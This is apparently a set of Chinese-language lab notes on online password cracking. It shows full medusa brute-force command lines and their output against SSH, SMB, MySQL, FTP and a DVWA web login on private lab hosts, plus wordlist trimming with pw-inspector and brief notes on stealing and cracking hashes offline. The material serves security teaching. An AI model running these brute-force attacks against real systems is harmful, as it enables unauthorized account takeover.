在线密码破解-----hydra pw-inspector - 按长度和字符集筛选字典 - pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l - pw-inspector -i /usr/share/wordlists/nmap.lst -o P.lst -u 密码破解效率 - 密码复杂度(字典命中率) - 带宽、协议、服务器性能、客户端性能 - 锁定阈值 - 单位时间最大登陆请求次数 |
root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l
root@K:~# cat /usr/share/wordlists/nmap.lst
root@K:~# more p.lst
root@K:~# pw-inspector
PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [http://www.thc.org]
Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s
Options:
-i FILE file to read passwords from (default: stdin)
-o FILE file to write valid passwords to (default: stdout)
-m MINLEN minimum length of a valid password
-M MAXLEN maximum length of a valid password
-c MINSETS the minimum number of sets required (default: all given)
Sets:
-l lowcase characters (a,b,c,d, etc.)
-u upcase characters (A,B,C,D, etc.)
-n numbers (1,2,3,4, etc.)
-p printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
-s special characters - all others not withint the sets above
PW-Inspector reads passwords in and prints those which meet the requirements.
The return code is the number of valid passwords found, 0 if none was found.
Use for security: check passwords, if 0 is returned, reject password choice.
Use for hacking: trim your dictionary file to the pw requirements of the target.
Usage only allowed for legal purposes.
root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l -m 3 -M 5
root@K:~# more p.lst
在线密码破解-----medusa Hydra的缺点 - 稳定性差,程序时常崩溃 - 速度控制不好,容易触发服务屏蔽或锁死机制 - 每主机新建进程,每服务新建实例 - 大量目标破解时性能差 Medusa的特点 - 稳定性好 - 速度控制得当 - 基于线程 - 支持模块少于hydra(不支持RDP ) - WEB-Form支持存在缺陷 |
root@k:~# medusa -h
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
medusa: option requires an argument -- 'h'
CRITICAL: Unknown error processing command-line options.
ALERT: Host information must be supplied.
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [TEXT] : Resume scan based on map of previous scan
oot@k:~# medusa -d
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
Available modules in "." :
Available modules in "/usr/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.1
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ svn.mod : Brute force module for Subversion sessions : version 2.1
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0
在线密码破解-----medusa medusa -d 破解windows密码 - medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F 破解Linux SSH密码 - medusa -M ssh -h 192.168.20.10 -u root -P pass.lst -e ns -F 其他服务密码破解 - medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F - medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM- DATA:"post?user=username&pas=password&Login=Login" |
msfadmin@metasploitable:~$ sudo passwd root
[sudo] password for msfadmin:
Enter new UNIX password:
Retype new UNIX password:
No password supplied
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -F -u root -P /usr/share/wordlists/nmap.lst
root@K:~# grep 1234 /usr/share/wordlists/nmap.lst
root@K:~# grep ^1234% /usr/share/wordlists/nmap.lst
root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v #
root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v # > pass.lst
root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -f -u root -P pass.lst
XP IP地址是192.168.1.118
C:\net user administrator zipper
root@K:~# medusa -M mebnt -h 192.168.1.118 -u administrator -P pass.lst -e ns -f
root@K:~# nmap P3306 192.168.1.113
Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-21 23:00 CST
Nmap scan report for 192.168.1.113
Host is up (10.00036s latency).
PORT STATE SERVOCE
3306/tcp open mysql
MAC Address: 08:00:27:B0:3A:76 (Oracle Virtualbox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
root@K:~# medusa -M mysql -h 192.168.1.113 -e ns -F -u root -P pass.lst
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of 5000 complete)
ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password: [SUCCESS]
root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of 5000 complete)
ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password: [SUCCESS]
root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst -n 2121
root@K:~# medusa -h 192.168.1.113 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pas=password&Login=Login"
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ERROR: The answer was NOT successfully received, understood, and accepted while trying admin 123456: error code 302
ACCOUNT XGWXK: [web-form] Host: 192.168.1.113 (1 of, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 4998 complete)
root@K:~# medusa -M web-form -q
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
web-form.mod (2.1) Luciano Bello <luciano@linux.org.ar> :: Brute force module for web forms
Available module options:
USER-AGENT:? User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".
FORM:? Target form to request. Default: "/"
DENY-SIGNAL:? Authentication failure message. Attempt flagged as successful if text is not present in
server response. Default: "Login incorrect"
CUSTOM-HEADER:? Custom HTTP header.
More headers can be defined by using this option several times.
FORM-DATA:<METHOD>?<FIELDS>
Methods and fields to send to web service. Valid methods are GET and POST. The actual form
data to be submitted should also be defined here. Specifically, the fields: username and
password. The username field must be the first, followed by the password field.
Default: "post?username=&password="
Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"
-m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"
在线密码破解-----medusa - -n : 非默认端口 - -s : 使用SSL连接 - -T : 并发主机数 medusa -M ftp -q |
root@k:~# medusa -M ftp -q
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ftp.mod (2.1) pMonkey <pmonkey@foofus.net> :: Brute force module for FTP/FTPS sessions
Available module options:
MODE:? (NORMAL*, EXPLICIT, IMPLICIT)
EXPLICIT: AUTH TLS Mode as defined in RFC 4217
Explicit FTPS (FTP/SSL) connects to a FTP service in the clear. Prior to
sending any credentials, however, an "AUTH TLS" command is issued and a
SSL session is negotiated.
IMPLICIT: FTP over SSL (990/tcp)
Implicit FTPS requires a SSL handshake to be performed before any FTP
commands are sent. This service typically resides on tcp/990. If the user
specifies this option or uses the "-n" (SSL) option, the module will
default to this mode and tcp/990.
NORMAL
The default behaviour if no MODE is specified. Authentication is attempted
in the clear. If the server requests encryption for the given user,
Explicit FTPS is utilized.
Example Usage:
medusa -M ftp -h host -u username -p password
medusa -M ftp -s -h host -u username -p password
medusa -M ftp -m MODE:EXPLICIT -h host -u username -p password
(*) Default value
离线密码破解 身份认证 - 禁止明文传输密码 - 每次认证使用HASH算法加密密码传输)(HASH算法加密容易、解密困难) - 服务器端用户数据库应加盐加密保存 破解思路 - 嗅探获取密码HASH - 利用漏洞登录服务器并从用户数据库获取密码HASH - 识别HASH类型 长度、字符集 - 利用李璇破解工具碰撞密码HASH |
离线密码破解 优势 - 离线不会触发密码锁定机制 - 不会产生大量登录失败日志引起管理员注意 HASH识别工具 - hash-identifier - Hashid - 可能识别错误或无法识别 |
火狐插件hashr